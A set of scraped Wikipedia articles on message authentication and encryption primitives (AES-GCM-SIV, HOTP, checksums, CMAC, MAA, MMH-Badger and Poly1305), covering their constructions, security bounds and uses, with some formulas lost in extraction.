AES-GCM-SIVis amode of operationfor theAdvanced Encryption Standardwhich provides similar (but slightly worse[1]) performance toGalois/Counter Modeas well as misuse resistance in the event of the reuse of acryptographic nonce. The construction is defined in RFC 8452.[2] AES-GCM-SIV is designed to preserve both privacy and integrity even if nonces are repeated. To accomplish this, encryption is a function of a nonce, the plaintext message, and optional additional associated data (AAD). In the event a nonce is misused (i.e., used more than once), nothing is revealed except in the case that the same message is encrypted multiple times with the same nonce. When that happens, an attacker is able to observe repeat encryptions, since encryption is a deterministic function of the nonce and message. However, beyond that, no additional information is revealed to the attacker. For this reason, AES-GCM-SIV is an ideal choice in cases that unique nonces cannot be guaranteed, such as multiple servers or network devices encrypting messages under the same key without coordination. Like Galois/Counter Mode, AES-GCM-SIV combines the well-knowncounter modeof encryption with the Galois mode of authentication. The key feature is the use of a syntheticinitialization vector(SIV) which is computed withGalois fieldmultiplication using a construction called POLYVAL (alittle-endianvariant of Galois/Counter Mode's GHASH). POLYVAL is run over the combination of nonce, plaintext, and additional data, so that the IV is different for each combination. POLYVAL is defined over GF(2128) by the polynomial: Note that GHASH is defined over the "reverse" polynomial: This change provides efficiency benefits on little-endian architectures.[3] Implementations of AES-GCM-SIV are available, among others, in the following languages:
https://en.wikipedia.org/wiki/AES-GCM-SIV
HMAC-based one-time password(HOTP) is aone-time password(OTP) algorithm based onHMAC. It is a cornerstone of theInitiative for Open Authentication(OATH). HOTP was published as an informationalIETFRFC4226in December 2005, documenting the algorithm along with a Java implementation. Since then, the algorithm has been adopted by many companies worldwide (see below). The HOTP algorithm is a freely availableopen standard. The HOTP algorithm provides a method of authentication by symmetric generation of human-readable passwords, orvalues, each used for only one authentication attempt. The one-time property leads directly from the single use of each counter value. Parties intending to use HOTP must establish someparameters; typically these are specified by the authenticator, and either accepted or not by the authenticated entity: Both parties compute the HOTP value derived from the secret keyKand the counterC. Then the authenticator checks its locally generated value against the value supplied by the authenticated. The authenticator and the authenticated entity increment the counterCindependently. Since the authenticated entity may increment the counter more than the authenticator,RFC4226recommends a resynchronization protocol. It proposes that the authenticator repeatedly try verification ahead of their counter through a window of sizes. The authenticator's counter continues forward of the value at which verification succeeds, and requires no actions by the authenticated entity. To protect against brute-force attacks targeting the small size of HOTP values, the RFC also recommends implementing persistent throttling of HOTP verification. This can be achieved by either locking out verification after a small number of failed attempts, or by linearly increasing the delay after each failed attempt. 6-digit codes are commonly provided by proprietary hardware tokens from a number of vendors informing the default value ofd. Truncation extracts 31bitsorlog10⁡(231)≈9.3{\textstyle \log _{10}(2^{31})\approx 9.3}decimal digits, meaning thatdcan be at most 10, with the 10th digit adding less variation, taking values of 0, 1, and 2 (i.e., 0.3 digits). After verification, the authenticator can authenticate itself simply by generating the next HOTP value, returning it, and then the authenticated can generate their own HOTP value to verify it. Note that counters are guaranteed to be synchronised at this point in the process. TheHOTP valueis the human-readable design output, ad-digit decimal number (without omission of leading 0s): That is, the value is thedleast significant base-10 digits of HOTP. HOTPis a truncation of theHMACof the counterC(under the keyKand hash functionH): where the counterCmust be usedbig-endian. Truncation first takes the 4 least significant bits of theMACand uses them as a byte offseti: where ":" is used to extract bits from a starting bit number up to and including an ending bit number, where these bit numbers are 0-origin. The use of "19" in the above formula relates to the size of the output from the hash function. With the default of SHA-1, the output is20bytes, and so the last byte is byte 19 (0-origin). That indexiis used to select 31 bits fromMAC, starting at biti× 8 + 1: 31 bits are a single bit short of a 4-byte word. Thus the value can be placed inside such a word without using the sign bit (the most significant bit). This is done to definitely avoid doing modular arithmetic on negative numbers, as this has many differing definitions and implementations.[1] Both hardware and software tokens are available from various vendors, for some of them see references below. Software tokens are available for (nearly) all major mobile/smartphoneplatforms (J2ME,[2]Android,[3]iPhone,[4]BlackBerry,[5]Maemo,[6]macOS,[7]and Windows Mobile[5]). Although the early reception from some of the computer press was negative during 2004 and 2005,[8][9][10]after IETF adopted HOTP asRFC4226in December 2005, various vendors started to produce HOTP-compatible tokens and/or whole authentication solutions. According to the article "Road Map: Replacing Passwords with OTP Authentication"[11]on strong authentication, published by Burton Group (a division ofGartner, Inc.) in 2010, "Gartner's expectation is that the hardwareOTPform factor will continue to enjoy modest growth whilesmartphoneOTPs will grow and become the default hardware platform over time."
https://en.wikipedia.org/wiki/HMAC-based_one-time_password
Achecksumis a small-sizedblockof data derived from another block ofdigital datafor the purpose ofdetecting errorsthat may have been introduced during itstransmissionorstorage. By themselves, checksums are often used to verifydata integritybut are not relied upon to verifydata authenticity.[1] Theprocedurewhich generates this checksum is called achecksum functionorchecksum algorithm. Depending on its design goals, a good checksum algorithm usually outputs a significantly different value, even for small changes made to the input.[2]This is especially true ofcryptographic hash functions, which may be used to detect many data corruption errors and verify overalldata integrity; if the computed checksum for the current data input matches the stored value of a previously computed checksum, there is a very high probability the data has not been accidentally altered or corrupted. Checksum functions are related tohash functions,fingerprints,randomization functions, andcryptographic hash functions. However, each of those concepts has different applications and therefore different design goals. For instance, a function returning the start of a string can provide a hash appropriate for some applications but will never be a suitable checksum. Checksums are used ascryptographic primitivesin larger authentication algorithms. For cryptographic systems with these two specific design goals[clarification needed], seeHMAC. Check digitsandparity bitsare special cases of checksums, appropriate for small blocks of data (such asSocial Security numbers,bank accountnumbers,computer words, singlebytes, etc.). Someerror-correcting codesare based on special checksums which not only detect common errors but also allow the original data to be recovered in certain cases. The simplest checksum algorithm is the so-calledlongitudinal parity check, which breaks the data into "words" with a fixed numbernof bits, and then computes the bitwiseexclusive or(XOR) of all those words. The result is appended to the message as an extra word. In simpler terms, forn=1 this means adding a bit to the end of the data bits to guarantee that there is an even number of '1's. To check the integrity of a message, the receiver computes the bitwise exclusive or of all its words, including the checksum; if the result is not a word consisting ofnzeros, the receiver knows a transmission error occurred.[3] With this checksum, any transmission error which flips a single bit of the message, or an odd number of bits, will be detected as an incorrect checksum. However, an error that affects two bits will not be detected if those bits lie at the same position in two distinct words. Also swapping of two or more words will not be detected. If the affected bits are independently chosen at random, the probability of a two-bit error being undetected is1/n. A variant of the previous algorithm is to add all the "words" as unsigned binary numbers, discarding any overflow bits, and append thetwo's complementof the total as the checksum. To validate a message, the receiver adds all the words in the same manner, including the checksum; if the result is not a word full of zeros, an error must have occurred. This variant, too, detects any single-bit error, but the pro modular sum is used inSAE J1708.[4] The simple checksums described above fail to detect some common errors which affect many bits at once, such as changing the order of data words, or inserting or deleting words with all bits set to zero. The checksum algorithms most used in practice, such asFletcher's checksum,Adler-32, andcyclic redundancy checks(CRCs), address these weaknesses by considering not only the value of each word but also its position in the sequence. This feature generally increases thecostof computing the checksum. The idea of fuzzy checksum was developed for detection ofemail spamby building up cooperative databases from multiple ISPs of email suspected to be spam. The content of such spam may often vary in its details, which would render normal checksumming ineffective. By contrast, a "fuzzy checksum" reduces the body text to its characteristic minimum, then generates a checksum in the usual manner. This greatly increases the chances of slightly different spam emails producing the same checksum. The ISP spam detection software, such asSpamAssassin, of co-operating ISPs, submits checksums of all emails to the centralised service such asDCC. If the count of a submitted fuzzy checksum exceeds a certain threshold, the database notes that this probably indicates spam. ISP service users similarly generate a fuzzy checksum on each of their emails and request the service for a spam likelihood.[5] A message that ismbits long can be viewed as a corner of them-dimensionalhypercube. The effect of a checksum algorithm that yields ann-bit checksum is to map eachm-bit message to a corner of a larger hypercube, with dimensionm+n. The2m+ncorners of this hypercube represent all possible received messages. The valid received messages (those that have the correct checksum) comprise a smaller set, with only2mcorners. A single-bit transmission error then corresponds to a displacement from a valid corner (the correct message and checksum) to one of themadjacent corners. An error which affectskbits moves the message to a corner which isksteps removed from its correct corner. The goal of a good checksum algorithm is to spread the valid corners as far from each other as possible, to increase the likelihood "typical" transmission errors will end up in an invalid corner. General topic Error correction Hash functions File systems Related concepts
https://en.wikipedia.org/wiki/Checksum
One-key MAC(OMAC) is a family ofmessage authentication codesconstructed from ablock ciphermuch like theCBC-MACalgorithm. It may be used to provide assurance of the authenticity and, hence, the integrity of data. Two versions are defined: OMAC is free for all uses: it is not covered by any patents.[4] The core of the CMAC algorithm is a variation ofCBC-MACthatBlackandRogawayproposed and analyzed under the name "XCBC"[5]and submitted toNIST.[6]The XCBC algorithm efficiently addresses the security deficiencies of CBC-MAC, but requires three keys. Iwata and Kurosawa proposed an improvement of XCBC that requires less key material (just one key) and named the resulting algorithmOne-Key CBC-MAC(OMAC) in their papers.[1]They later submitted the OMAC1 (= CMAC),[2]a refinement of OMAC, and additional security analysis.[7] To generate anℓ-bit CMAC tag (t) of a message (m) using ab-bit block cipher (E) and a secret key (k), one first generates twob-bit sub-keys (k1andk2) using the following algorithm (this is equivalent to multiplication byxandx2in afinite fieldGF(2b)). Let ≪ denote the standard left-shift operator and ⊕ denote bit-wiseexclusive or: As a small example, supposeb= 4,C= 00112, andk0=Ek(0) = 01012. Thenk1= 10102andk2= 0100 ⊕ 0011 = 01112. The CMAC tag generation process is as follows: The verification process is as follows: CMAC-C1[8]is a variant of CMAC that provides additionalcommitment and context-discovery securityguarantees.
https://en.wikipedia.org/wiki/CMAC
TheMessage Authenticator Algorithm(MAA) was one of the firstcryptographicfunctions for computing amessage authentication code(MAC). It was designed in 1983 byDonald Daviesand David Clayden at theNational Physical Laboratory (United Kingdom)in response to a request of the UK Bankers Automated Clearing Services. The MAA was one of the first Message Authentication Code algorithms to gain widespread acceptance. The original specification[1][2]of the MAA was given in a combination of natural language and tables, complemented by two implementations inCandBASICprogramming languages. The MAA was adopted byISOin 1987 and became part of international standards ISO 8730[3][4]and ISO 8731-2[5]intended to secure the authenticity and integrity of banking transactions. Later, cryptanalysis of MAA revealed various weaknesses, including feasible brute-force attacks, existence of collision clusters, and key-recovery techniques.[6][7][8][9]For this reason, MAA was withdrawn from ISO standards in 2002 but continued to be used as a prominent case study for assessing variousformal methods.[10] The MAA has been used as a prominent case study for assessing variousformal methods. In the early 1990s, theNPLdeveloped three formal specifications of the MAA: one inZ,[11]one inLOTOS,[12]and one inVDM.[13][14]The VDM specification became part of the 1992 revision of the International Standard 8731-2, and three implementations were manually derived from that latter specification:C,Miranda, andModula-2.[15] Other formal models of the MAA have been developed. In 2017, a complete formal specification of the MAA as a largeterm rewriting systemwas published;[16]From this specification,implementations of the MAA in fifteen different languageshave been generated automatically. In 2018, two new formal specifications of the MAA, inLOTOSand LNT, have been published.[17]
https://en.wikipedia.org/wiki/Message_Authenticator_Algorithm
Badgeris amessage authentication code(MAC) based on the idea ofuniversal hashingand was developed[when?]by Boesgaard, Scavenius, Pedersen, Christensen, and Zenner.[1]It is constructed by strengthening the ∆-universal hash family MMH using an ϵ-almost strongly universal (ASU) hash function family after the application of ENH (see below), where the value of ϵ is1/(232−5){\displaystyle 1/(2^{32}-5)}.[2]Since Badger is a MAC function based on theuniversal hashfunction approach, the conditions needed for the security of Badger are the same as those for other universal hash functions such asUMAC. The Badger MAC processes a message of length up to264−1{\displaystyle 2^{64}-1}bits and returns anauthentication tagof lengthu⋅32{\displaystyle u\cdot 32}bits, where1≤u≤5{\displaystyle 1\leq u\leq 5}. According to thesecurityneeds, user can choose the value ofu{\displaystyle u}, that is the number of parallelhash treesin Badger. One can choose larger values ofu, but those values do not influence further the security of MAC. Thealgorithmuses a 128-bit key and the limited message length to be processed under this key is264{\displaystyle 2^{64}}.[3] The key setup has to be run only once per key in order to run the Badgeralgorithmunder a given key, since the resulting internal state of the MAC can be saved to be used with any other message that will be processed later. Hash families can be combined in order to obtain new hash families. For the ϵ-AU, ϵ-A∆U, and ϵ-ASU families, the latter are contained in the former. For instance, an A∆U family is also an AU family, an ASU is also an A∆U family, and so forth. On the other hand, a stronger family can be reduced to a weaker one, as long as a performance gain can be reached. A method to reduce ∆-universal hash function touniversal hashfunctions will be described in the following. Theorem 2[1] LetH△{\displaystyle H^{\triangle }}be an ϵ-AΔU hash family from a setAto a setB. Consider a message(m,mb)∈A×B{\displaystyle (m,m_{b})\in A\times B}. Then the familyHconsisting of the functionsh(m,mb)=H△(m)+mb{\displaystyle h(m,m_{b})=H^{\triangle }(m)+m_{b}}is ϵ-AU. Ifm≠m′{\displaystyle m\neq m'}, then theprobabilitythath(m,mb)=h(m′,mb′){\displaystyle h(m,m_{b})=h(m',m'_{b})}is at most ϵ, sinceH△{\displaystyle H^{\triangle }}is an ϵ-A∆U family. Ifm=m′{\displaystyle m=m'}butmb≠mb′{\displaystyle m_{b}\neq m_{b}'}, then theprobabilityis trivially 0. The proof for Theorem 2 was described in[1] The ENH-family is constructed based on theuniversal hashfamily NH (which is also used inUMAC): Where '+w{\displaystyle +_{w}}' means 'addition modulo2w{\displaystyle 2^{w}}', andmi,ki∈{0,…,2w−1}{\displaystyle m_{i},k_{i}\in {\big \{}0,\ldots ,2^{w}-1{\big \}}}. It is a2−w{\displaystyle 2^{-w}}-A∆U hash family. Lemma 1[1] The following version of NH is2−w{\displaystyle 2^{-w}}-A∆U: Choosing w=32 and applying Theorem 1, one can obtain the2−32{\displaystyle 2^{-32}}-AU function family ENH, which will be the basic building block of the badger MAC: where all arguments are 32-bits long and the output has 64-bits. Badger is constructed using the strongly universality hash family and can be described as where anϵH∗{\displaystyle \epsilon _{H^{*}}}-AU universal function familyH*is used to hash messages of any size onto a fixed size and anϵF{\displaystyle \epsilon _{F}}-ASU function familyFis used to guarantee the strong universality of the overall construction.NHandENHare used to constructH*. The maximum input size of the function familyH*is264−1{\displaystyle 2^{64}-1}and the output size is 128 bits, split into 64 bits each for the message and the hash. The collision probability for theH*-function ranges from2−32{\displaystyle 2^{-32}}to2−26.14{\displaystyle 2^{-26.14}}. To construct the strongly universal function familyF, the ∆-universal hash family MMH* is transformed into a strongly universal hash family by adding another key. There are two steps that have to be executed for every message: processing phase and finalize phase.[3] In this phase, the data is hashed to a 64-bit string. A core functionh:{0,1}64×{0,1}128→{0,1}64{\displaystyle \left\{0,1\right\}^{64}\times \left\{0,1\right\}^{128}\to \left\{0,1\right\}^{64}}is used in this processing phase, that hashes a 128-bit stringm2∥m1{\displaystyle m_{2}\parallel m_{1}}to a 64-bit stringh(k,m2,m1){\displaystyle h(k,m_{2},m_{1})}as follows: for anyn,+n{\displaystyle +_{n}}means addition modulo2n{\displaystyle 2^{n}}. Given a⁠2n{\displaystyle 2n}⁠-bit stringx,⁠L(x){\displaystyle L(x)}⁠means least significantnbits, and⁠U(x){\displaystyle U(x)}⁠means most significantnbits. A message can be processed by using this function. Denotelevel_key[j][i]bykji{\displaystyle k_{j}^{i}}. Pseudo-code of the processing phase is as follow. In this phase, the 64-string resulting from the processing phase is transformed into the desired MAC tag. This finalization phase uses theRabbitstream cipherand uses both key setup and IV setup by taking the finalization keyfinal_key[j][i]askji{\displaystyle k_{j}^{i}}. Pseudo-code of the finalization phase From the pseudocode above,kdenotes the key in the Rabbit Key Setup(K) which initializes Rabbit with the 128-bit keyk.Mdenotes the message to be hashed and |M| denotes the length of the message in bits.⁠qi{\displaystyle q_{i}}⁠denotes a messageMthat is divided intoiblocks. For the given⁠2n{\displaystyle 2n}⁠-bit stringxthenL(x)andU(x)respectively denoted its least significant n bits and most significantnbits. Boesgard, Christensen and Zenner report the performance of Badger measured on a 1.0 GHzPentium IIIand on a 1.7 GHzPentium 4processor.[1]The speed-optimized versions were programmed in assembly language inlined in C and compiled using the IntelC++7.1 compiler. The following table presents Badger's properties for various restricted message lengths. "Memory req." denotes the amount of memory required to store the internal state including key material and the inner state of theRabbitstream cipher. "Setup" denotes the key setup, and "Fin." denotes finalization with IV-setup. The name MMH stands for Multilinear-Modular-Hashing. Applications inMultimediaare for example to verify theintegrityof an on-line multimedia title. The performance of MMH is based on the improved support of integerscalar productsin modern microprocessors. MMH uses single precision scalar products as its most basic operation. It consists of a (modified)inner productbetween the message and a keymoduloaprimep{\displaystyle p}. The construction of MMH works in thefinite fieldFp{\displaystyle F_{p}}for some prime integerp{\displaystyle p}. MMH* involves a construction of a family ofhash functionsconsisting ofmultilinearfunctions onFpk{\displaystyle F_{p}^{k}}for some positive integerk. The family MMH* of functions fromFpk{\displaystyle F_{p}^{k}}toFp{\displaystyle F_{p}}is defined as follows. wherex, mare vectors, and the functionsgx{\displaystyle g_{x}}are defined as follows. In the case of MAC,mis a message andxis a key wherem=(m1,…,mk){\displaystyle m=(m_{1},\ldots ,m_{k})}andx=(x1,…,xk),xi,mi∈Fp{\displaystyle x=(x_{1},\ldots ,x_{k}),x_{i},m_{i}\in \!F_{p}}. MMH* should satisfy the security requirements of a MAC, enabling say Ana and Bob to communicate in an authenticated way. They have a secret keyx. Say Charles listens to the conversation between Ana and Bob and wants to change the message into his own message to Bob which should pass as a message from Ana. So, his messagem'and Ana's messagemwill differ in at least one bit (e.g.m1≠m1′{\displaystyle m_{1}\neq m'_{1}}). Assume that Charles knows that the function is of the formgx(m){\displaystyle g_{x}(m)}and he knows Ana's messagembut he does not know the keyxthen the probability that Charles can change the message or send his own message can be explained by the following theorem. Theorem 1[4]:The family MMH* is ∆-universal. Proof: Takea∈Fp{\displaystyle a\in F_{p}}, and letm,m′{\displaystyle m,m'}be two different messages. Assumewithout loss of generalitythatm1≠m1′{\displaystyle m_{1}\neq m'_{1}}. Then for any choice ofx2,x3,…,xs{\displaystyle x_{2},x_{3},\ldots ,x_{s}}, there is To explain the theorem above, takeFp{\displaystyle F_{p}}forp{\displaystyle p}prime represent the field asFp={0,1,…,p−1}⏟p{\displaystyle F_{p}=\underbrace {{\big \{}0,1,\ldots ,p-1{\big \}}} _{p}}. If one takes an element inFp{\displaystyle F_{p}}, let say0∈Fp{\displaystyle 0\in F_{p}}then the probability thatx1=0{\displaystyle x_{1}=0}is So, what one actually needs to compute is But, From the proof above,1p{\displaystyle {\frac {1}{p}}}is thecollisionprobabilityof the attacker in 1 round, so on averagepverification queries will suffice to get one message accepted. To reduce the collision probability, it is necessary to choose largepor to concatenatensuch MACs usingnindependent keys so that the collision probability] becomes1pn{\displaystyle {\frac {1}{p^{n}}}}. In this case the number of keys are increased by a factor ofnand the output is also increased byn. Halevi and Krawczyk[4]construct a variant calledMMH32∗{\displaystyle \mathrm {MMH} _{32}^{*}}. The construction works with 32-bitintegersand with theprimeintegerp=232+15{\displaystyle p=2^{32}+15}. Actually the primepcan be chosen to be any prime which satisfies232<p<232+216{\displaystyle 2^{32}<p<2^{32}+2^{16}}. This idea is adopted from the suggestion by Carter and Wegman to use the primes216+1{\displaystyle 2^{16}+1}or231−1{\displaystyle 2^{31}-1}. where{0,1}32{\displaystyle \left\{0,1\right\}^{32}}means{0,1,…,232−1}{\displaystyle \left\{0,1,\ldots ,2^{32}-1\right\}}(i.e., binary representation) The functionsgx{\displaystyle g_{x}}are defined as follows. where By theorem 1, thecollisionprobabilityis aboutϵ=2−32{\displaystyle \epsilon =2^{-32}}, and the family ofMMH32∗{\displaystyle \mathrm {MMH} _{32}^{*}}can be defined asϵ-almost ∆ Universal withϵ=2−32{\displaystyle \epsilon =2^{-32}}. The value ofkthat describes the length of the message and keyvectorshas several effects: Below are the timing results for various implementations of MMH[4]in 1997, designed by Halevi and Krawczyk.
https://en.wikipedia.org/wiki/MMH-Badger_MAC
Poly1305is auniversal hash familydesigned byDaniel J. Bernsteinin 2002 for use incryptography.[1][2] As with any universal hash family, Poly1305 can be used as a one-timemessage authentication codeto authenticate a single message using a secret key shared between sender and recipient,[3]similar to the way that aone-time padcan be used to conceal the content of a single message using a secret key shared between sender and recipient. Originally Poly1305 was proposed as part of Poly1305-AES,[2]a Carter–Wegman authenticator[4][5][1]that combines the Poly1305 hash withAES-128to authenticate many messages using a single short key and distinct message numbers. Poly1305 was later applied with a single-use key generated for each message usingXSalsa20in theNaClcrypto_secretbox_xsalsa20poly1305 authenticated cipher,[6]and then usingChaChain theChaCha20-Poly1305authenticated cipher[7][8][1]deployed inTLSon the internet.[9] Poly1305 takes a 16-byte secret keyr{\displaystyle r}and anL{\displaystyle L}-byte messagem{\displaystyle m}and returns a 16-byte hashPoly1305r⁡(m){\displaystyle \operatorname {Poly1305} _{r}(m)}. To do this, Poly1305:[2][1] The coefficientsci{\displaystyle c_{i}}of the polynomialc1rq+c2rq−1+⋯+cqr{\displaystyle c_{1}r^{q}+c_{2}r^{q-1}+\cdots +c_{q}r}, whereq=⌈L/16⌉{\displaystyle q=\lceil L/16\rceil }, are: ci=m[16i−16]+28m[16i−15]+216m[16i−14]+⋯+2120m[16i−1]+2128,{\displaystyle c_{i}=m[16i-16]+2^{8}m[16i-15]+2^{16}m[16i-14]+\cdots +2^{120}m[16i-1]+2^{128},} with the exception that, ifL≢0(mod16){\displaystyle L\not \equiv 0{\pmod {16}}}, then: cq=m[16q−16]+28m[16q−15]+⋯+28(Lmod16)−8m[L−1]+28(Lmod16).{\displaystyle c_{q}=m[16q-16]+2^{8}m[16q-15]+\cdots +2^{8(L{\bmod {1}}6)-8}m[L-1]+2^{8(L{\bmod {1}}6)}.} The secret keyr=(r[0],r[1],r[2],…,r[15]){\displaystyle r=(r[0],r[1],r[2],\dotsc ,r[15])}is restricted to have the bytesr[3],r[7],r[11],r[15]∈{0,1,2,…,15}{\displaystyle r[3],r[7],r[11],r[15]\in \{0,1,2,\dotsc ,15\}},i.e., to have their top four bits clear; and to have the bytesr[4],r[8],r[12]∈{0,4,8,…,252}{\displaystyle r[4],r[8],r[12]\in \{0,4,8,\dotsc ,252\}},i.e., to have their bottom two bits clear. Thus there are2106{\displaystyle 2^{106}}distinct possible values ofr{\displaystyle r}. Ifs{\displaystyle s}is a secret 16-byte string interpreted as a little-endian integer, then a:=(Poly1305r⁡(m)+s)mod2128{\displaystyle a:={\bigl (}\operatorname {Poly1305} _{r}(m)+s{\bigr )}{\bmod {2}}^{128}} is called theauthenticatorfor the messagem{\displaystyle m}. If a sender and recipient share the 32-byte secret key(r,s){\displaystyle (r,s)}in advance, chosen uniformly at random, then the sender can transmit an authenticated message(a,m){\displaystyle (a,m)}. When the recipient receives anallegedauthenticated message(a′,m′){\displaystyle (a',m')}(which may have been modified in transmit by an adversary), they can verify its authenticity by testing whether a′=?(Poly1305r⁡(m′)+s)mod2128.{\displaystyle a'\mathrel {\stackrel {?}{=}} {\bigl (}\operatorname {Poly1305} _{r}(m')+s{\bigr )}{\bmod {2}}^{128}.}Without knowledge of(r,s){\displaystyle (r,s)}, the adversary has probability8⌈L/16⌉/2106{\displaystyle 8\lceil L/16\rceil /2^{106}}of finding any(a′,m′)≠(a,m){\displaystyle (a',m')\neq (a,m)}that will pass verification. However, the same key(r,s){\displaystyle (r,s)}must not be reused for two messages. If the adversary learns a1=(Poly1305r⁡(m1)+s)mod2128,a2=(Poly1305r⁡(m2)+s)mod2128,{\displaystyle {\begin{aligned}a_{1}&={\bigl (}\operatorname {Poly1305} _{r}(m_{1})+s{\bigr )}{\bmod {2}}^{128},\\a_{2}&={\bigl (}\operatorname {Poly1305} _{r}(m_{2})+s{\bigr )}{\bmod {2}}^{128},\end{aligned}}} form1≠m2{\displaystyle m_{1}\neq m_{2}}, they can subtract a1−a2≡Poly1305r⁡(m1)−Poly1305r⁡(m2)(mod2128){\displaystyle a_{1}-a_{2}\equiv \operatorname {Poly1305} _{r}(m_{1})-\operatorname {Poly1305} _{r}(m_{2}){\pmod {2^{128}}}} and find a root of the resulting polynomial to recover a small list of candidates for the secret evaluation pointr{\displaystyle r}, and from that the secret pads{\displaystyle s}. The adversary can then use this to forge additional messages with high probability. The original Poly1305-AES proposal[2]uses the Carter–Wegman structure[4][5]to authenticate many messages by takingai:=Hr(mi)+pi{\displaystyle a_{i}:=H_{r}(m_{i})+p_{i}}to be the authenticator on theith messagemi{\displaystyle m_{i}}, whereHr{\displaystyle H_{r}}is a universal hash family andpi{\displaystyle p_{i}}is an independent uniform random hash value that serves as a one-time pad to conceal it. Poly1305-AES usesAES-128to generatepi:=AESk⁡(i){\displaystyle p_{i}:=\operatorname {AES} _{k}(i)}, wherei{\displaystyle i}is encoded as a 16-byte little-endian integer. Specifically, a Poly1305-AES key is a 32-byte pair(r,k){\displaystyle (r,k)}of a 16-byte evaluation pointr{\displaystyle r}, as above, and a 16-byte AES keyk{\displaystyle k}. The Poly1305-AES authenticator on a messagemi{\displaystyle m_{i}}is ai:=(Poly1305r⁡(mi)+AESk⁡(i))mod2128,{\displaystyle a_{i}:={\bigl (}\operatorname {Poly1305} _{r}(m_{i})+\operatorname {AES} _{k}(i){\bigr )}{\bmod {2}}^{128},} where 16-byte strings and integers are identified by little-endian encoding. Note thatr{\displaystyle r}is reused between messages. Without knowledge of(r,k){\displaystyle (r,k)}, the adversary has low probability of forging any authenticated messages that the recipient will accept as genuine. Suppose the adversary seesC{\displaystyle C}authenticated messages and attemptsD{\displaystyle D}forgeries, and candistinguishAESk{\displaystyle \operatorname {AES} _{k}}from a uniform random permutationwith advantage at mostδ{\displaystyle \delta }. (Unless AES is broken,δ{\displaystyle \delta }is very small.) The adversary's chance of success at a single forgery is at most: δ+(1−C/2128)−(C+1)/2⋅8D⌈L/16⌉2106.{\displaystyle \delta +{\frac {(1-C/2^{128})^{-(C+1)/2}\cdot 8D\lceil L/16\rceil }{2^{106}}}.} The message numberi{\displaystyle i}must never be repeated with the same key(r,k){\displaystyle (r,k)}. If it is, the adversary can recover a small list of candidates forr{\displaystyle r}andAESk⁡(i){\displaystyle \operatorname {AES} _{k}(i)}, as with the one-time authenticator, and use that to forge messages. TheNaClcrypto_secretbox_xsalsa20poly1305 authenticated cipher uses a message numberi{\displaystyle i}with theXSalsa20stream cipher to generate a per-messagekey stream, the first 32 bytes of which are taken as a one-time Poly1305 key(ri,si){\displaystyle (r_{i},s_{i})}and the rest of which is used for encrypting the message. It then uses Poly1305 as a one-time authenticator for the ciphertext of the message.[6]ChaCha20-Poly1305does the same but withChaChainstead ofXSalsa20.[8]XChaCha20-Poly1305 using XChaCha20 instead of XSalsa20 has also been described.[10] The security of Poly1305 and its derivatives against forgery follows from itsbounded difference probabilityas auniversal hash family: Ifm1{\displaystyle m_{1}}andm2{\displaystyle m_{2}}are messages of up toL{\displaystyle L}bytes each, andd{\displaystyle d}is any 16-byte string interpreted as a little-endian integer, then Pr[Poly1305r⁡(m1)−Poly1305r⁡(m2)≡d(mod2128)]≤8⌈L/16⌉2106,{\displaystyle \Pr[\operatorname {Poly1305} _{r}(m_{1})-\operatorname {Poly1305} _{r}(m_{2})\equiv d{\pmod {2^{128}}}]\leq {\frac {8\lceil L/16\rceil }{2^{106}}},} wherer{\displaystyle r}is a uniform random Poly1305 key.[2]: Theorem 3.3, p. 8 This property is sometimes calledϵ{\displaystyle \epsilon }-almost-Δ-universalityoverZ/2128Z{\displaystyle \mathbb {Z} /2^{128}\mathbb {Z} }, orϵ{\displaystyle \epsilon }-AΔU,[11]whereϵ=8⌈L/16⌉/2106{\displaystyle \epsilon =8\lceil L/16\rceil /2^{106}}in this case. With a one-time authenticatora=(Poly1305r⁡(m)+s)mod2128{\displaystyle a={\bigl (}\operatorname {Poly1305} _{r}(m)+s{\bigr )}{\bmod {2}}^{128}}, the adversary's success probability for any forgery attempt(a′,m′){\displaystyle (a',m')}on a messagem′{\displaystyle m'}of up toL{\displaystyle L}bytes is: Pr[a′=Poly1305r⁡(m′)+s∣a=Poly1305r⁡(m)+s]=Pr[a′=Poly1305r⁡(m′)+a−Poly1305r⁡(m)]=Pr[Poly1305r⁡(m′)−Poly1305r⁡(m)=a′−a]≤8⌈L/16⌉/2106.{\displaystyle {\begin{aligned}\Pr[&a'=\operatorname {Poly1305} _{r}(m')+s\mathrel {\mid } a=\operatorname {Poly1305} _{r}(m)+s]\\&=\Pr[a'=\operatorname {Poly1305} _{r}(m')+a-\operatorname {Poly1305} _{r}(m)]\\&=\Pr[\operatorname {Poly1305} _{r}(m')-\operatorname {Poly1305} _{r}(m)=a'-a]\\&\leq 8\lceil L/16\rceil /2^{106}.\end{aligned}}} Here arithmetic inside thePr[⋯]{\displaystyle \Pr[\cdots ]}is taken to be inZ/2128Z{\displaystyle \mathbb {Z} /2^{128}\mathbb {Z} }for simplicity. ForNaClcrypto_secretbox_xsalsa20poly1305 andChaCha20-Poly1305, the adversary's success probability at forgery is the same for each message independently as for a one-time authenticator, plus the adversary's distinguishing advantageδ{\displaystyle \delta }against XSalsa20 or ChaCha aspseudorandom functionsused to generate the per-message key. In other words, the probability that the adversary succeeds at a single forgery afterD{\displaystyle D}attempts of messages up toL{\displaystyle L}bytes is at most: δ+8D⌈L/16⌉2106.{\displaystyle \delta +{\frac {8D\lceil L/16\rceil }{2^{106}}}.} The security of Poly1305-AES against forgery follows from the Carter–Wegman–Shoup structure, which instantiates a Carter–Wegman authenticator with a permutation to generate the per-message pad.[12]If an adversary seesC{\displaystyle C}authenticated messages and attemptsD{\displaystyle D}forgeries of messages of up toL{\displaystyle L}bytes, and if the adversary has distinguishing advantage at mostδ{\displaystyle \delta }against AES-128 as apseudorandom permutation, then the probability the adversary succeeds at any one of theD{\displaystyle D}forgeries is at most:[2] δ+(1−C/2128)−(C+1)/2⋅8D⌈L/16⌉2106.{\displaystyle \delta +{\frac {(1-C/2^{128})^{-(C+1)/2}\cdot 8D\lceil L/16\rceil }{2^{106}}}.} For instance, assuming that messages are packets up to 1024 bytes; that the attacker sees 264messages authenticated under a Poly1305-AES key; that the attacker attempts a whopping 275forgeries; and that the attacker cannot break AES with probability above δ; then, with probability at least 0.999999 − δ, all the 275are rejected Poly1305-AES can be computed at high speed in various CPUs: for ann-byte message, no more than 3.1n+ 780 Athlon cycles are needed,[2]for example. The author has released optimizedsource codeforAthlon,PentiumPro/II/III/M,PowerPC, andUltraSPARC, in addition to non-optimizedreference implementationsinCandC++aspublic domain software.[13] Below is a list of cryptography libraries that support Poly1305:
https://en.wikipedia.org/wiki/Poly1305
